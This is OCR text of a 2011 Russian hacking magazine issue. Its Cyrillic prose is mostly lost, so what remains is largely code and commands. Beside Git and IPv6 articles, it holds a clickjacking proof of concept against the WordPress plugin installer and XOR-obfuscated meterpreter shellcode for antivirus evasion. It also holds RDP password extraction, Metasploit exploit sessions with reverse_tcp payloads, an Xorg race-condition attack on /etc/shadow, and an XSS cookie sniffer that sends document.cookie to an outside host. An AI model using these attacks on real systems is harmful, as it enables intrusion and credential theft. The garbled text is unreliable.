git init
git, init.
Git- (
.git). , - . . ,
Git Bash (master). ,
. ?
. . () ,
. ( - ), , .
.
git add
commit.
Commit
, . ,
, commit, staging area.
. ,
, .
, staging area:
git add.
. .
:
git add *.js
git add index.php
git commit
commit , , ( ):
git commit
staging area
. commit
12 /155/ 2011
jQuery GitHub
, , ,
, . Git Vim (-,
). , <i> (
), , Initial
Commit. , , <ESC> :wq, . !
Git , commit
. -, -m
commit:
git commit -m "initial commit"
-a staging area
commit .
Git staging area
. -m -a
:
git commit -am 'update to index.php'
git status
git status
. .
commit, git status , .
, , . , ,
git add, - ,
changes to be
committed.
git branch / git checkout
, .
: , ,
. , ,
. Git ,
. branch,
, ,
.
git branch
branch,
. master
branch , .
043
PC ZONE
,
branch, :
experimentalBrunch
.
, Git
( - master-). checkout,
:
git log
, ,
.
(git log graph) GUI-:
gitk --all
git add .
git commit -m 'New architecutre introduced'
,
. .
, , , :
git checkout master
: master- , , ,
.
git merge
. ,
master-.
git merge. , master branch,
:
044
.
, ,
.
GITHUB:
, , Git ,
,
. Git ,
.
,
Git. , ,
GitHub (www.github.com).
, , ,
.
, GitHub, , .
, Git . ,
12 /155/ 2011
Git&GitHub:
, . open source ,
Sign Up . ,
SSH-. ,
-, ( PuTTY)
GitHub-. Public Keys Add another public key.
.
SSH , .
,
, . ,
.
(help.github.com/working-withkey-pass-phrases).
git clone
Git , GitHub
.
, -
, (, ,
- , ). GitHub
. jQuery.
GitHub-, clone URL.
URL , ( Git
) , clone:
git clone git://github.com/jquery/jquery.git
Git jquery
. ,
gitk all.
git push
.
git,
. ! GitHub
(Create Repository), .
,
. GitHub
public clone URL ,
, personal clone URL .
GitHub .
git remote add origin git@github.com:aburgess/My-FirstGitHub-Repo.git
git push origin master
.
origin
private clone URL. git-push master origin (. . GitHub).
,
. GitHub-
.
git pull
push ,
git pull , .
: git fetch ( ) get merge
( ):
git fetch upstream master
git merge upstream/master
12 /155/ 2011
. GitHub Git-.
,
. , ,
,
. . , , ,
,
. GitHub , .
Explore GitHub,
Languages ,
. ,
Watch Fork:
Fork , ;
Watch , ,
, fashboard ( , ).
, . ,
, , .
Follow
, . .
Pull Request
Admin. ,
, (wiki,
download, issues) . .
, ,
. ,
,
Pull request.
FOLLOW GITHUB
GitHub .
-, Git
. .
1,1 , 3 . GitHub,
Git. z
045
PC ZONE
CLICKJACKING: , ,
, :
?,
.
, ,
.
.
,
-.
046
WWW
:
www.sectheory.
com/clickjacking.htm;
www.contextis.
com/resources/
white-papers/clickjacking;
w2spconf.
com/2010/papers/
p27.pdf;
www.owasp.org/
index.php/Clickjacking.
WARNING
.
.
CLICKJACKING?
,
. click jacking ,
- . , , ! ?
HTML-,
:
- <iframe>;
HTML- ,
;
HTML- ,
z-index.
, HTML-
! ,
, iframe,
, .
iframe
- ,
. , , iframe,
CSS- opacity
12 /155/ 2011
""
z-index.
, , , ,
, ,
.
CSS- .
?
clickjacking-.
,
, :
<html> <h1 style="text-align:center"> </h1>
<p style="font-size: 38px;">!
<br> !</p>
<!-- iframe -->
<div style="z-index:10; opacity:0; position:absolute;
top:0px; ">
<iframe scrolling="no" style="width:800px; height:500px;"
src="http://www.bing.com/search?q=buy+kindle+amazon">
</iframe>
</div>
<!-- iframe
-->
<div style="position:absolute; top:200px; left:210px;">
<a href="#"> ?</a>
</div>
</html>
,
Bing.
. ,
.
, , , Retwit Like,
, .
,
.
12 /155/ 2011
, , - ?
, , . ,
, -,
WordPress. ,
. -
WordPress, , .
,
Install Now (, , Firefox).
. http://wordpress/wp-admin/
plugin-install.php?tab=plugin-information&plugin=wp-galleryremote, plugin
. , iframe
Install Now. .
, ,
( ). , ,
( zip-)
URL: http://wordpress/wp-content/plugins/.
. ,
? . . ,
PoC SlidePress,
XSS-.
, .
(
)
(security-assessment.com).
WordPress 3.1.3 2011 .
(- !),
clickjacking. .
047
PC ZONE
?
, -
. ,
. JS-,
.
framebuster framekiller, :
if (top.location != location)
top.location = self.location;
X-FRAME-OPTIONS iframe
.
, ?
,
. ,
. iframe,
(,
).
( , ).
iframe anchor (http://example.com/#section),
.
iframe (
, ),
.
, ( -
, ). ,
.
Flash Player,
. .
-
Flash, , ,
-.
, Flash Player
, SWF- , , URL
www.macromedia.com/support/documentation/en/flashplayer/help/
settings_manager02.html. , ,
(: bit.ly/sDR5Qv). proof-of-concept iframe .
,
- . Adobe
, ( framebusting)
. .
. : , Adobe
iframe ,
SWF-,
Flash Player? , !
048
framebuster- ,
, , - ,
. , ,
,
clickjacking-. (bit.ly/vYFL4x),
framebuster-
.
, , :
<head>
<style> body { display : none;} </style>
</head>
<body>
<script>
if (self == top) {
var theBody = document.getElementsByTagName('body')[0];
theBody.style.display = "block";
} else {
top.location = self.location;
}
</script>
, JS-
. ?
, X-FRAMEOPTIONS. ,
! 2009 ,
(Internet Explorer, Safari,
Firefox, Chrome). X-FRAME-OPTIONS . DENY
.
SAMEORIGIN
.
( WordPress
). . -,
. -,
, (
X-FRAME-OPTIONS
). , -, ,
.
-
12 /155/ 2011
- . .
function refreshSettings(timeout) {
window.setTimeout(function() {
$('#settings').empty().append($('<iframe
allowtransparency="true" src="https://www.macromedia.com/support/flashplayer/sys/settingsmanager2.
swf?defaultTab=privacy"></iframe>'));
setSettingsVisibility();
}, timeout);
}
Flash Player'
?
, , ,
SQLi , , XSS. (, , ).
,
. , clickjacking
- ( ),
. FireFox NoScript
(addons.mozilla.org/ru/firefox/addon/noscript)
. ClearClick
,
. , . z
- WordPress
12 /155/ 2011
049
PC ZONE
IPV6-
?
, ,
:
IPv4- .
? ? ?
.
,
IPv4-
IPv6. :
.
IPv6
,
.
uTorrent Teredo
050
WWW
IPv6:
ipv6-test.com/
speedtest
,
IPv6:
bit.ly/rHoc4B
SixXS
:
bit.ly/v0tOAC
IPv6:
?
128-
(2001:5c0:1400:a::68d) 32- (65.148.151.124)
IPv6-. : IPv6-
, . ,
,
IPv4-. ,
IPv6, IP-,
NAT . , . .
1. ,
NAT.
NAT, IPv4- .
, () IP-
, () . NAT :
, ,
. ICQ, IP-, .
(
), IPv6 .
, , ,
IPv4 IPv6 (
IPv6 ).
, IPv6. ,
, ,
IPv6-
. IPv6
,
( IPv4-) .
12 /155/ 2011
IPv6:
IPv6- IPv4-. ,
2. IPv6-.
, -
(, BitTorrent), IPv6
, . ,
. . IP UDP, UDP IPv6, IPv6 TCP- UDP-,
.
, , IPv6- IPv4 (, UDPv4).
, .
IPv6-to-IPv4?
, IPv6
UDPv4-: , ,
.
3. . ,
. , torrent-,
NAT', ,
IP- (
). IPv6-,
. ,
, NAT',
IP- ( IPv6,
). torrent IPv6: uTorrent, Azureus, Transmission.
IPv6 DHT ( ),
, . peers6,
, 18 (16 , 2 ).
12 /155/ 2011
, IPv6- ,
. ,
thepiratebay.org ipv6.nnm-club.ru .
4. .
( , ). ,
,
:).
.
. , IPv6- .
, IPv6?
, , , IPv6- . , -,
, -, (
, ), , -, .
, ,
IPv4. , , IPv6-, ,
, .
. .
, . IPv6-,
. . IPv6
( ),
.
NAT, IPv4-, , ,
.
IPv6. .
051
PC ZONE
Gogonet/Freenet6
gogonet.gogo6.com
,
,
NAT. GUI, /56-
. IPv6, ,
, .
.
Hurricane Electric IPv6
http://www.tunnelbroker.net
, /48- IPv6-.
,
(, , , , , ,
), ,
. ,
,
IP.
SixXS
www.sixxs.net
AYIYA-, , ,
IPv6.
(
) 40
. :
(
LinkedIn), .
10 IPv6 (bit.ly/snYfdm).
6to4
IPv4-, 6to4
IPv6.
, . 6to4- IPv6-, 6to4-,
IPv4-, IPv6-. 6to4 IPv6-, anycast- 192.88.99.1. ,
6to4, IPv6- IPv6-.
, .
6to4- 2002:xxyy:zztt,
xx.yy.zz.tt IPv4-,
, ,
192.88.99.1. . 6to4
, 6to4
, ,
, . - ,
. .
IP-,
IPv6. 6to4 . ,
,
, , 200 .
Teredo
,
IP-, NAT. 6to4 -
052
IPv6-
(, , ) Teredo (, Miredo):
sudo apt-get install miredo
IPV6
1. IPv6 , , 128- . IPv6-
: , 2001:0db8:11a3:09d7:1f34:8a2e:07a0:765d.
0000,
. 2001:0db8:0000:0000:0000:0000:ae21:ad12 2001:db8::ae21:ad12. ,
IPv6-,
: http://[2001:db8::ae21:ad12]. , IPv6-
DNS-.
2. - , , IPv6 ,
IPv4. /prefix'
(CIDR / VLSM). IPv6 /64. . IPv6 /64- , ,
.
/48.
3. NAT'.
, (VoIP), ,
P2p-. .
12 /155/ 2011
IPv6:
IPv6-
: , ,
. ,
, (Teredo NAT). .
Teredo IPv6: ,
, (
,
teredo.remlab.net). .
6to4 IPv6-,
, Teredo
. : Teredo-
UDP-, . .
. , Teredo NAT.
ipv6.google.com, netsh int
ipv6 show teredo. :
NAT , Teredo .
( )
.
, , ,
IPv4-,
. , , IPv6-. (bit.ly/vRZwX8),
. ,
. ping
traceroute, ipv6-test.com. :
IPv6,
. ,
, , IPv6-. ,
IPv4-
.
( , ). ,
, .
IPv6 UDPv4
.
( , ) gogo6/
Freenet6 (gogonet.gogo6.com), .
, ,
, IPv6, ,
12 /155/ 2011
. freenet6, gogo6,
.
: IPv6-in-IPv4 (
, IP), IPv6-in-IPv4 NAT
Traversal ( IPv6-in-UDP-is-IPv4),
, IP, IPv4-in-IPv6 ( ,
IPv4-, IPv6-).
TSP (Tunnel
Setup Protocol). , .
:
1. gogoCLIENT (gogonet.gogo6.com/
profile/gogoCLIENT).
2. ,
Connect.
,
,
- IPv6- (, ipv6.google.com).
.
3653.
. ,
IPv4- IPv6.
IPv6-, :
1. (gogonet.gogo6.com/page/freenet6registration), freenet6 .
2. Connect Anonymously Connect Using the
Following Credentials, .
3. Connect.
IPv6-,
test-ipv6.com. .
freenet6 - (username.broker.freenet6.net).
,
plain-text'. ,
Advanced PASS DSS
3DES1 Digest MD5.
IPV6
freenet6 , IPv6-,
. ,
,
, (,
). ,
- .
, 10 ,
. z
053
/ EASY HACK
EASY
HACK
SMS
! , IDS, DMZ,
PDF - ,
. ,
, SMS-, . ,
SMS. ,
, . (
).
, . :) Smsglobal
(www.smsglobal.com). ,
25 SMS- .
, ( Preferences Sender ID)
. ! ,
. ,
,
SMS 1 . ,
,
SMS. , - e-mail,
- SMS. , ,
,
- .
WINDOWS
, Windows 7/2008, ,
, ,
, .
1. .
2. :
.{ED7BA470-8E54-465E-825C-99712043E01C}
- , ,
. ,
EasyHack. :)
054
12 /155/ 2011
EASY HACK
,
. , !
. ,
, .
, -.
,
. ! ,
-. ,
. XXI
! -, . :)
Python- Findmyhash
(code.google.com/p/findmyhash). ,
-.
, .
:
python findmyhash_v1.1.2.py MD5 -g \
-h a25b2710ba9de114396adc7dfb0a7235
python findmyhash_v1.1.2.py NTLM -f hacked_domain.txt
:
-h ;
-f ;
-g Google.
,
.
MD5- NTLM-
RDP
, , , ,
,
,
. ,
,
, . , , ,
.
. RDP Windows
.
RDP ,
6- (
Vista Ser ver 2008).
,
rdp-.
. , ?
Default.rdp, (,
RDP 6). , password
51:b: .
,
CryptUnprotectData() crypt32.dll.
, ( ).
,
, , SID
, .
12 /155/ 2011
- Cain&Abel
(www.oxid.it).
Remote Desktop Password Decoder
rdp-. C&A
.
, MSF
.
rdp .
MSF, :
1. meterpreter .
2. post-:
run post/windows/gather/enum_rdp_pwd
rdp-
055
/ EASY HACK
SSLV3-
056
.
4) ,
1.2, , 3.
,
, . ,
, ( 1.1
1.2). (renegotiation)
( 2) ( 3).
.
(
:)) ?
TLS (Session ID).
, . ,
TCP. . ( 1)
( 1.1). ,
( 3),
.
?
, ,
( , ). (www.g-sec.lu/practicaltls.pdf).
. -,
SSLv3/TLS, HTTPS,
FTPS, SMTPS, POP3S . . , . ?
. ,
- .
, ,
12 /155/ 2011
EASY HACK
. ,
. , HTTP
:
1. URL. , CSRF,
GET-. header
injection.
1) 1.2
GET /path/to/resource.jsp HTTP/1.0
Ignor-me:
2) , ,
:
GET /path/to/resource.jsp HTTP/1.0
Ignore-me: GET /index.jsp HTTP/1.0
Cookie: sessionCookie=Token
,
HTTP ( 1.2):
GET /url_that_will_302_to_HTTP
Ignore-what-comes-now:
3. XSS . web-
TRACE, JavaScript-.
1.2 :
TRACE / HTTP/1.0
X:This content will be reflected in the response to the cl
ient<html><script>alert('XSS')</script></html>
X-ignore:
. PoC. Python,
. :) ,
, - (www.ssllabs.com/ssldb/analyze.
html), ssltest, BackTrack 5,
ssltlstest .
100 %- ,
XOR METERPRETER
12 /155/ 2011
:
windows/meterpreter/bind_tcp MSF;
R ;
msfencode ;
-c 5 x86/shikata_ga_nai payload ;
-t c : C;
-o test_3.c .
msfencode,
, . msfpayload c C R, stage ,
(meterpreter -).
, ,
. , MSF payload
,
. msfpayload
- ( ).
- -, ,
. ! main - MSF,
. :
int main (int argc, char **argv)
{
int (*func) ();
func=(int (*)()) buf;
(int)(*func)();
}
057
/ EASY HACK
meterpreter
. (GCC, VC).
Dev-Cpp.
.
, , meterpreter (,
icmp/udp-, TCP ,
meterpreter).
, XOR . :) XOR -:
unsigned char buf[] = ".shellcode_here";
int main(int argc, char **argv)
{
int i;
for (i=0;i<sizeof buf; i++){
buf[i] = buf[i] ^ 0xcc ;
printf("\\x%02x",buf[i]);
}
}
058
1.
2.
3.
4.
- .
- , XOR.
main XOR.
main :
int main (int argc, char **argv)
{
int i;
for (i=0;i<sizeof buf; i++){
buf[i] = buf[i] ^ 0xcc ;
}
int (*func) ();
func=(int (*)()) buf;
(int)(*func)();
}
5. .
, , XOR
, (A ^ B ^ B = A).
Avast .
? , .
- ,
( XOR)
.
y0nd13 aka D1g1
. :)
12 /155/ 2011
WEXLER.HOME 903
, ( ,
). , , .
handycraft' , . ,
, .
.
WEXLER.HOME 903 64- Windows 7
, .
. WEXLER.HOME
750 . ,
, .
WEXLER.HOME 903
4 , .
. , , ,
.
Windows 7.
WEXLER
Wexler:
+7 (800) 200-9660
www.wexler.ru
Microsoft Windows 7, / ,
Microsoft.
(ivinside.blogspot.com)
(115612, . , .1)
,
! , ,
,
. , !
Apache mod_proxy
CVSSV2
5.0
(AV:N/AC:L/AU:N/C:P/I:N/A:N)
BRIEF
: 11 2011 .
: Rodrigo Marcos.
CVE: CVE-2011-3368.
(, Nginx Squid), Apache ,
mod_proxy.
-
(, ),
, .
, mod_proxy,
.
EXPLOIT
RewriteRule
ProxyPassMatch -,
, -. Apache
. .
, -
:
RewriteRule (.*)\.(jpg|gif|png) http://images.example.com$1.$2 [P]
ProxyPassMatch (.*)\.(jpg|gif|png) http://images.example.com$1.$2
,
. :
GET @other.example.com/something.png HTTP/1.1
:
python apache_scan.py -r www.example.com -u /img/test.gif
, DMZ
python apache_scan.py -r www.example.com -u /img/test.gif
-d internalhost.local
, DMZ
python apache_scan.py -r www.example.com -u /img/test.gif \
-d internalhost.local -e 80 -g /accounts/index.html
TARGETS
-, , :
SOLUTION
http://images.example.com@other.example.com/something.png
, other.example.com,
images.example.com@ .
URI (@other.example.com/something.png HTTP/1.1)
HTTP,
060
mod_proxy
(goo.gl/xNIqR). ,
RewriteRule :
RewriteRule /(.*)\.(jpg|gif|png) http://images.example.com/$1.$2 [P]
12 /155/ 2011
Xorg
CVSSV2
5.7
(AV:L/AC:L/AU:S/C:C/I:P/A:P)
BRIEF
: 28 2011 .
: vladz.
CVE: CVE-2011-4029.
vladz Xorg, /tmp/.tXn-lock (n
X). .
, X- .
EXPLOIT
Xorg /tmp/.Xn-lock. : ()
/tmp/.tXn-lock O_EXCL PID, /tmp/.Xn-lock, .
/tmp/.Xn-lock. , , .
, chmod() , , /tmp/.tXn-lock
, open().
, /tmp/.tXn-lock
open() ( 296) chmod() ( 318).
, , ... Xorg
( ),
( 341) ,
chmod()?
:
# strace X :1
[...]
open("/tmp/.tX1-lock", O_WRONLY|O_CREAT|O_EXCL, 0644) = 0
write(0, "
2192\n", 11)
= 11
chmod("/tmp/.tX1-lock", 0444)
= 0
1. X- (PID n).
2. , SIGSTOP /tmp/.tX1-lock. ,
chmod().
3.
/tmp/.tX1-lock.
4. /tmp/.tX1-lock -> /etc/shadow.
5. SIGCONT, chmod() 444 /etc/shadow.
, ,
X-, ,
. : /tmp/.X1-lock -> /dontexist.
X- FatalError().
exploit-db.com, ID 18040.
:
cc xchmod.c -o xchmod
Array.reduceRight - Mozilla
Firefox
CVSSV2
10.0
(AV:N/AC:L/AU:N/C:C/I:C/A:C)
BRIEF
: 13 2011 .
: Chris Rohlf, Yan Ivnitskiy, Matteo Memelli, dookie2000ca,
sinn3r, mr_me, TecR0c.
CVE: CVE-2011-2371.
Metasploit,
Mozilla Firefox 3.6. ,
reduceRight()
.
EXPLOIT
12 /155/ 2011
reduceRight callback
:
( callback-),
, , -
061
/
obj.length = 2197815302;
f = function trigger(prev, myobj, indx, array) {
alert(myobj[0]);
}
obj.reduceRight(f, 1, 2, 3);
</script>
</body>
</html>
. Callback- ( ), .
reduceRight JS-
array_extra jsarray.cpp. 2740
Array.Length :
jsuint length;
if (!js_GetLengthProperty(cx, obj, &length))
return JS_FALSE;
start = length 1,
start , length . JS, , :
<html>
<head>
</head>
<body>
<object id="d"><object>
<script>
var myobject = document.getElementById('d');
function spray() {
//...
}
spray();
obj = new Array;
062
101F1806
101F180
POP EAX
RETN
; <&KERNEL32.VirtualAlloc>
103E0D7B
103E0D7D
102D8002
102D8003
10040001
10040002
POP EBX
RETN
104E6917
104E6918
POP EDX
RETN
102AC000
102AC001
102E0005
102E0006
101F1806
101F1807
102B3401
102B3402
PUSHAD
RETN
102AC001
RETN
7C809AE1 >
7C809AE3
7C809AE4
7C809AE6
7C809AE9
7C809AEC
7C809AEF
7C809AF2
7C809AF4
7C809AF9
7C809AFA
1003876B
Metasploit.
msf > use exploit/windows/browser/mozilla_reduceright
msf exploit(mozilla_reduceright) > set payload windows/
meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(mozilla_reduceright) > set lhost 192.168.0.121
lhost => 192.168.0.121
msf exploit(mozilla_reduceright) > set uripath test
12 /155/ 2011
. 12
, ,
Metasploit, . ,
ACDSee FotoSlate 4.0 ( 146) id String,
. PLP-
ACDSee FotoSlate .
SEH- . pop-pop-ret,
, .
0x263a5b57 ipwssl6.dll.
:
msf > use exploit/windows/fileformat/acdsee_fotoslate_string
msf exploit(acdsee_fotoslate_string) > set payload
windows/exec
payload => windows/exec
msf exploit(acdsee_fotoslate_string) > set cmd calc.exe
cmd => calc.exe
msf exploit(acdsee_fotoslate_string) > exploit
[*] Creating 'msf.plp' file ...
[*] Generated output file
/home/pikofarad/.msf4/data/exploits/msf.plp
mod_proxy
,
( ).
TARGETS
,
. z
TARGETS
, .
ACDSee FotoSlate
id,
PLP-
CVSSV2
10.0
(AV:N/AC:L/AU:N/C:C/I:C/A:C)
BRIEF
: 10 2011 .
: Parvez Anwar, juan vazquez.
CVE: CVE-2011-2595.
ACD FotoSlate
, ,
4x6 5x7. ,
12 /155/ 2011
Xorg
063
(ICQ: 555-856-204)
DEMOTIVATORS.RU
XSS
- ,
, ()
.
, , XSS demotivators.ru.
WWW
demotivators.ru
;
www.djangoproject.com
Django-.
064
12 /155/ 2011
, .
:
, ,
, .
<b>. -
: <b> !</b>. , ,
?
, <script> <body>.
. XSS-, :
<sCr<bOdY>iPt>
,
, . , - ,
, .
. ,
<b>.
, , , :
<script>, <img>, <body>, <frameset>, <input>, <span>...
, -
PHP- strip_tags(),
. , . , <img> :
: <img src="http://1.com/1.jpg">
: < ="http://1.com/1.jpg">
, strip_tags(),
- . , . , -
XSS
12 /155/ 2011
065
JS-
XSS-
. : ( ),
, . .
, , , ? 2030
JS- , .
JS -:
,
,
XSS:
var servers = [
'http://free1.host1.com/',
'http://free2.host1.com/',
'http://free3.host1.com/',
...
'http://free1.host5.com/',
'http://free2.host5.com/',
'http://free3.host5.com/'
];
for (var key in servers)
{
document.getElementById('footer').innerHTML +=
'<script src="'+servers[key]+'"></script>';
if (loaded){break;}
}
if (loaded){...}
loaded, , .
,
, . ,
.
.
,
PHP ,
. ,
logs.txt, .
$_SERVER['HTTP_USER_AGENT'] ;
$_SERVER['REMOTE_ADDR'] IP-;
$_SERVER['HTTP_REFERER'] ( );
date("d.m.y H:i") ;
urldecode($_GET['c'])
;
$_SERVER['QUERY_STRING']
.
, strip_tags(). ,
Django, .
, ,
XSS-. , , , , .
, ,
- ,
.
, ,
HTML-. HTML,
- -
. , , XSS. - <!DOCTYPE>,
.
XSS ,
- .
.
:
<!><html><head></head><body></body></html>
066
, -
, ,
, , . <!DOCTYPE>!,
-
demotivators.ru HTML- (<html>
<body>). ,
, ,
, - . :-)
12 /155/ 2011
XSS DEMOTIVATORS.RU
XSS ,
.
:
1. - XSS
, vkontakte.ru, mail.ru,
yandex.ru . .
XSS ,
. , demotivators.ru .
, XSS
:
2. . :
, , ,
, JavaScript-,
XSS div-,
,
. ,
:
<script src="http://partner.ru/
js.php?id=123"></script>
:
// ""
function n(){return new Image();}
var xss_1=n(), xss_2=n(), xss_3=n(),
sniff = 'var x = new Image(); x.src
= "http://tvoi.sniffer.com/?c="+
escape(document.cookie);';
// XSS
""
xss_1.src = 'http://site1.ru/search.
php?q="><script>'+sniff+'</script>';
xss_2.src = 'http://site2.ru/search.
php?q="><script>'+sniff+'</script>';
xss_3.src = 'http://site3.ru/search.
php?q="><script>'+sniff+'</script>';
window.onload=function()
{
document.getElementById('banners').
innerHTML = '<script src="http://
partner.ru/js.php?id=123"></script>';
}
3. .
JS + PHP,
. : JS-,
, JS-
, . ,
- .
XSS-, , . , <!DOCTYPE> -
, ,
,
. ,
. <FRAMESET>.
:
<!DOCTYPE><FRAMESET onLoad="{xss}"></FRAMESET>
,
, .
:
<!DOCTYPE><FRAMESET onLoad="{xss}"
style="display:none;"></FRAMESET>
12 /155/ 2011
,
action
.
(, )
action-.
(, ).
4. pop-under
pop-up.
<script>, .
5.
iframe. , .
6. - JavaScript:
document.getElementById('id_dema').
src = 'http://host.ru/podmena.jpg';
7. : iframe
(
).
8.
JS-.
{xss} javascript- .
, . .
, ,
. ,
AJAX. , ,
-
HTML + JS. ,
.
.
THE END
.
, (
).
, XSS - .
, , ,
demotivators.ru.
.
:
500 .
12 (180
), .
,
. ! z
067
DBMX
,
, ,
!
,
.
WWW
www.master-x.com
.
www.gofuckbiz.com
-.
www.rxpblog.com
-.
( ) , .
, .
. ,
. ,
. - ,
.
,
, , . ,
, ,
.
-
, , .
.
068
OEM
, .
,
,
.
()
. , ,
,
-
,
.
CPA ( )
, -
,
, ,
.
12 /155/ 2011
:
:
:
(generics,
,
) .
,
,
,
, ,
.
- ,
,
3050% .
,
-
. -, ,
.
(, , )
.
.
,
.
.
(
).
.
,
.
-
,
, :).
, .
, .
-
.
,
, ,
.
, ,
.
-
.
.
Pharmcash.com
RX-Partners.biz
Stimul-Cash.com
OXOnetwork.com
2010
2006
2006
2007
/ -:
40% ,
100 45%,
300 50%
3050% (
)
75%
70%
, ,
, ,
, ,
, ,
, ,
, ,
., ., ., ., .,
., ., ., .
Visa, MasterCard,
ACH, Wire
$100
$100
$50
$100
,
(
)
(10 ),
12 /155/ 2011
069
:
:
:
. .
. , , xhamster.com
,
.
, .
, ?
, -
.
, ,
.
$30.
-
4060%. , .
, .
(),
.
,
.
,
.
( ),
.
,
().
WordPress .
.
FGH ( ,
). ,
FGH
. , -
, ,
, .
Royal-Cash.com
EarnCoin.com
Aepartnership.com
FerroCash.com
CashManiacs.com
2001
2003
2003
1999
2003
/ -
5060% $3040
50%
50%
50%
50%
44
23
173
58
128
check, wire,
WebMoney, Paxum,
eCoin, ePese
wire, Payoneer,
WebMoney, Paxum,
eCoin
Paxum,
ePayService
check, wire,
WebMoney, Paxum,
ePayService
$100
$100
$300
$50
070
12 /155/ 2011
:
:
:
. Pay per
click . PPC- ,
-. ( ), , .
,
. , ,
. (bid) ,
() . , , ,
, -. PPC- .
, bid, .
, ,
.
,
PPC.
,
.
:
.
,
.
,
,
( ,
).
,
.
.
Bidtraffic.com
Click9.com
Peakclick.com
Daoclick.com
Thegreenppc.com
Bizzclick.com
2004
2008
2005
2009
2009
2009
/ -
7095%
70%
70%
80%
80%
75%
$40
$50
$100
$50
$50
$10
ePassporte,
PayPal,
StormPay,
EPESE,
WebMoney
Epese,
Webmoney,
Wire
Wire,
ePassporte,
Western Union,
WebMoney
Webmoney,
ePassporte,
EPESE,
PayPal, Wire
Webmoney, Wire,
PayPal
ePassporte, PayPal,
StormPay, EPESE,
Visa, MasterCard,
Western Union,
PayPal, Wire, Liberty
Reserve, WebMoney
12 /155/ 2011
071
:
:
:
.
. : , , .
,
, . , , .
, , ,
. (2045%)
.
(, ,
. .).
-,
,
. . ,
-.
.
, ,
.
,
,
.
, .
Uffiliates.com
Affactive.com
Fulltiltpoker.com
AffClub.com
Pokerstarspartners.com
2008
2009
2004
2007
2007
/ -
2540%
3045%
2035%
$70225
2540%
$50150
2030%
$75150
-,
,
-,
MoneyBookers,
Neteller, Wire,
Check
MoneyBookers,
Neteller,
Wire, Check,
Webmoney
Neteller, Visa,
MasterCard, Maestro,
EntroPay, Paysafecard,
Webmoney
Click2Pay, ClickandBuy,
EntroPay, Maestro,
MoneyBookers, Neteller,
Solo, Visa Delta, Visa
Electron, WebMoney, Wire
Instant eChecks,
Moneybookers,
ClickandBuy, Visa,
Neteller, Wire, Check,
WebMoney, EntroPay
072
12 /155/ 2011
:
:
:
,
. -
, , .
,
.
.
, .
( ),
,
.
-. ,
,
: -.
, , .
,
XML ,
.
.
,
.
Glavtorg.com
Stimul-Cash.com
Affiliate-program.Amazon.com
KingsProfit.com
2010
2010
1996
2010
()
()
()
/ -
2535%
25%
48%
25%
Webmoney, Epass,
PayPal, Wire
Check
Webmoney, Wire
$100
$50
$10
$100
12 /155/ 2011
073
oxdef (oxdef.info)
Firefox
, ? , Firefox.
,
.
FIREFOX
Chrome (#06/11) Opera
(#06/11).
. -,
-
. Opera Google
Chrome, FF, ,
.
.
-
-
-.
Firesheep (codebutler.
github.com/firesheep), Wi-Fi
. ,
.
.
074
WWW
Mozilla:
mzl.la/u2Nol0.
Firefox Defcon 17:
bit.ly/u7BVcS.
,
:
bit.ly/sSzdbO.
chrome
content
browserOverlay.js
browserOverlay.xul
locale
en-US
browserOverlay.dtd
browserOverlay.properties
skin
browserOverlay.css
chrome.manifest
install.rdf
12 /155/ 2011
Firefox
Install.rdf ( RDF/XML),
.
: , , ,
, (
) . .
updateURL updateKey, .
install.rdf:
<?xml version="1.0"?>
<RDF xmlns="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
xmlns:em="http://www.mozilla.org/2004/em-rdf#">
<Description about="urn:mozilla:install-manifest">
<em:id>helloworld@oxdef.info</em:id>
<em:name>Hello World</em:name>
<em:description>Hello world!</em:description>
<em:version>0.1</em:version>
<em:creator>Oxdef</em:creator>
<em:homepageURL>http://oxdef.info</em:homepageURL>
<em:updateURL>https://oxdef.info/update
</em:updateURL>
<em:type>2</em:type>
<em:targetApplication><!-- Mozilla Firefox -->
<Description>
<em:id>{ec8030f7-c20a-464f-9b0e-13a3a9e97384}
</em:id>
<em:minVersion>3.0</em:minVersion>
<em:maxVersion>6.0.*</em:maxVersion>
</Description>
</em:targetApplication>
</Description>
</RDF>
Mozilla Firefox
XML- XUL (
), , , .
JavaScript, . . XPCOM (. Cross Platform
Component Object Model)
. , , , .
, JavaScript, Java, Python,
C++.
XPCOM-. XPConnect
,
(, ,
, ).
Gecko.
.
, , XPCOM- .
().
XUL- ( content).
XUL- JavaScript:
Mozilla Firefox
<menubar id="main-menubar">
<menu id="helloworld-hello-menu"
label="&helloworld.hello.label;"
accesskey="&helloworld.helloMenu.accesskey;"
insertafter="helpMenu">
<menupopup>
<menuitem id="helloworld-hello-menu-item"
label="&helloworld.hello.label2;"
accesskey="&helloworld.helloItem.accesskey;"
oncommand=
"XULSchoolChrome.BrowserOverlay.sayHello(event);" />
</menupopup>
</menu>
</menubar>
. , , (chrome://...),
. . chrome.manifest
chrome- ,
, , :
content
helloworld
chrome/content/
overlay chrome://browser/content/browser.xul chrome://
helloworld/content/browserOverlay.xul
skin
helloworld classic/1.0 chrome/skin/
locale
helloworld en-US
chrome/locale/en-US/
<script type="application/x-javascript"
src="chrome://helloworld/content/browserOverlay.js" />
<stringbundleset id="stringbundleset">
<stringbundle id="helloworld-string-bundle"
src="chrome://helloworld/locale/browserOverlay.properties"/>
</stringbundleset>
12 /155/ 2011
, , , .
:
addons.mozilla.org (. AMO);
.
075
,
.
: updateURL updateKey.
updateURL
, XML/RDF-
.
( )
.
<em:updateURL>http://www.foo.com/update.cgi?id=%ITEM_ID%
&version=%ITEM_VERSION%</em:updateURL>
,
,
Wi-Fi. ,
Mozilla ,
HTTP- updateURL.
updateKey. ,
, ,
, :
<em:updateKey>MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDK42
6erD/H3XtsjvaB5+PJqbhjZc9EDI5OCJS8R3FIObJ9ZHJK1TXeaE7JWq
t9WUmBWTEFvwS+FI9vWu8058N9CHhDNyeP6i4LuUYjTURnn7Yw/Igz
yIJ2oKsYa32RuxAyteqAWqPT/J63wBixIeCxmysfawB/zH4KaPiY3vn
rzQIDAQAB</em:updateKey>
signature ( ) updateHash,
- xpi-
. McCoy
.
AMO
AMO. , ,
, updateURL.
,
:
*** LOG addons.updates: Requesting https://versioncheck.
addons.mozilla.org/update/VersionCheck.php?reqVersion=2&
id=inspector@mozilla.org&version=2.0.10&maxAppVersion=8.0a1&
status=userEnabled&appID={ec8030f7-c20a-464f-9b0e13a3a9e97384}&appVersion=5.0&appOS=Linux&appABI=x86_64-gcc3&
locale=en-US¤tAppVersion=5.0&updateType=97
